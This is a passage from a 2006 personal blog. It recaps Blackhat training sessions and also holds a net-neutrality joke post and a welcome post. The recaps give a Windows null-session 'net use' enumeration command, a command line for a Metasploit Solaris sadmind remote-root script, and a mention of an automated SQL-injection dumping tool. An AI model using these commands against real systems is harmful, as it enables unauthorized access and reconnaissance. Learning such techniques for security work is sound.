In addition to this nifty trick, I also found out about a really neat tool called Absinthe, which can be used to exploit a SQL injection vulnerability to automatically enumerate the entire contents of the target database. Once you have located a vulnerable parameter, you just specify a few settings and let fly, and it will return all available database contents by automatically discovering tables and attributes.

If you have any specific questions for me regarding my thoughts on Blackhat (unfortunately I didn't stay to attend the briefings), or any of the material covered, please leave me a comment or contact me directly. I am usually on AIM during most normal hours.

And, on another note, due to my vacation eating habits, the fitness challenge is pretty blown and I'm probably as fat as ever.

Blackhat Day 2

2006-07-31T23:53:00.000-06:00

So, I completed day three of Blackhat 2006 today and today was the 1st day of my Advanced Database Hacking class, but it was actually riddled with technical difficulties and issues with the material, so I am going to put off a recap until after class tomorrow in the hope that it will pick up and come through with some good stuff for the last day.

I do however, own a recap of day 2 which was the final day of "Ultimate Hacking" put on by Foundstone. Day two covered Unix based exploits and involved some really good tools and techniques. While in general it is harder to hack than Windows, because it can be locked down better, I was surprised by how many useful techiques can be employed to enumerate and attack Unix based hosts.

The gem of the day I am going to share with you, is a tool that exploits the 'sadmind' utility in Solaris to remotely gain root access on any version of Solaris 9 and below. The "feature" was labeled such by Solaris and so it was not patched for some time as they insisted that the functionality was desireable, and in most Solaris installs has not been unconfigured since it involves a fairly security conscious admin to know how to fix the flaw.

The tool is a script called 'rootdown.pl' and can be downloaded from metasploit here. To execute it on a remote host and initiate an interactive session, issue the following command:

perl -w rootdown.pl -h -i

Blackhat Day 1 - Windows Lose or Draw

2006-07-29T23:05:00.000-06:00

Today was day one of Blackhat here in Las Vegas. Let me just start by saying I'd forgotten how much I dislike the Vegas strip. In concept, I guess it seems cool: flashing lights, dazzling fountains, and fabulous buffets, but when you actually get here it really just turns out to be flashing prostitutes, dizzying second hand smoke, and a flabulous mass of sweaty, scantily clad tourists. Not such a pretty thing. Oh and not being a gambler, it bugs me that everything is geared towards trying to force you into the casino. All recreational activities end at 8pm (unless its a weekend, then its 6pm) to try and shuffle you onto the gaming floor for more smoke filled bliss then you can shake a stack of hooker pamphlets at (and yea, although there are less than last time I was here, the hand slappers are still alive and well - just wait 'til dark).

Oh well, I am made to suffer these things for a very noble cause. Hacking. Or rather, hacking deterence. The first of my two Blackhat courses was an "Ultimate Hacking" course taught by Foundstone, a security consulting and development company currently owned by McAffee. To say it was eye opening would be an understatement. Today's class (the first of 2 days) covered Windows exploits and how to hack a Windows host. Having never really become intimately involved with current Windows hacking practices I finally became completely and utterly convinced of the adament arguments posted by all those "Unix groupies" (into which I am slowly converting) about how insecure Windows is. Well, tomorrow we cover Unix exploits, so we will be able to compare the two after that, but for now, I am somewhat awestruck at how profound the techniques are for compromising Windows.

It seems to me that in its attempts to make everything so easily accessed and manipulated, there were some major security oversights in Windows. In fact, most of the tools needed to enumerate and fingerprint hosts and users are actually built in Windows utilities that are left open by default. Really, most attacks (minus any password cracking) can be done successfully using only internal Windows tools.

I will give you one example of said tool. This is the 'net' command. I am most familiar with it for its use as a method for spamming all the machines on a network with a message using the 'net send' option. However, it becomes even more useful when you use it to exploit a Windows "feature" (Microsoft claims it is such) that allows a host to create a null connection to another host to exchange information. The problem with this is that the information shared is very plentiful and can quickly allow an attacker to profile the host, domain, and users stored on it. This command consists of the following run from the command line:

net use \\hostnameorip\$ipc "" \u:/""

The connection, once established can then be viewed using:

net use

Once created a plethera of other commands and tools can be used to profile the host. That's really all I can give you at the moment (gotta respect that Foundstone non-disclosure agreement), but it is a pretty powerful bit of info. You should check out Foundstone's website for some more cool tools and tips. I'm really looking forward to checking out the Unix hacks in tomorrow's class. Stay tuned for a recap on those soon.

Countdown To Bl@khAt

2006-07-28T00:01:00.000-06:00

Tomorrow afternoon, I'll be heading down to Vegas for Blackhat USA 2006 at Caesar's Palace. This is one of the world's top security/hackeresk conferences, but is geared towards security professionals rather than other hacker conferences such as HOPE or Defcon.

I will be attending 2 of the training sessions on Sat.-Sun. and then Mon.-Tues. which are "Ultimate Hacking: Black Hat Edition", which covers penetration testing and hardening, and "Advanced Database Security Assessment" which covers security issues obviously related to databases.

Props to my employer Doba for sponsoring this surely enlightening trip to Sin City. I will be taking the rest of the week off after the conference to hit the California coast with my family, but keep posted for more details and my impresssions on the conference once I get the chance to dish it out. I am a little disappointed that I can't stick around for Defcon, which starts right after my training sessions end, but I'm sure the beach will compensate me for it. Until then, it's happy trails.

The 'Tubes' that get us 'Internets'

2006-07-27T13:32:00.000-06:00

So, maybe if you keep up at all on technology and politics, you might have heard of Senator Ted Stevens (R-Alaska), who recently explained the reason for his opposing vote on the net-neutrality bill recently brought before the Commerce Committee. His intellecutal response involves the analogy that the Internet is made up of "tubes". Check out the story with a link to the original audio at http://blog.wired.com/27BStroke6/?entry_id=1512499.

Once you're up to date on the original antics, you will really appreciate the comedy of a fake blog site created by "Senator Stevens", which really takes the Internet tube action to the next level! Check it out here (Also hosted on blogspot! Yea for blogspot!). I gotta say I got a really big kick out of it!

Welcome to my 00000001'st post (Nachooooooooooo!)

2006-07-27T13:21:00.000-06:00

Just a shout out welcome post to everyone joining me for this inaugural listing. I finally decided it was time to make my life a little more public after the many long hours spent in front of the LCD bliss with family and friends always wanting to hear news, but getting little response. I also find it amazing how many ideas that I come across, or that come across me in a day that I plan to act on, but usually only end up remembering until the next interesting idea comes along.

That said, the purpose of this blog will be to document some of those ideas and activities that I have been involved in, or the ones that are banging around in my head needing to get put down for later retrieval. You will most likely find here a mix of personal and professional as I plan to share thoughts on work, family, life, and various technology issues. And if no one ever really ends up reading this besides me, what the hell? I could care less. So, if you are up for it, join me for some hopefully insightful and entertaining entries in the future.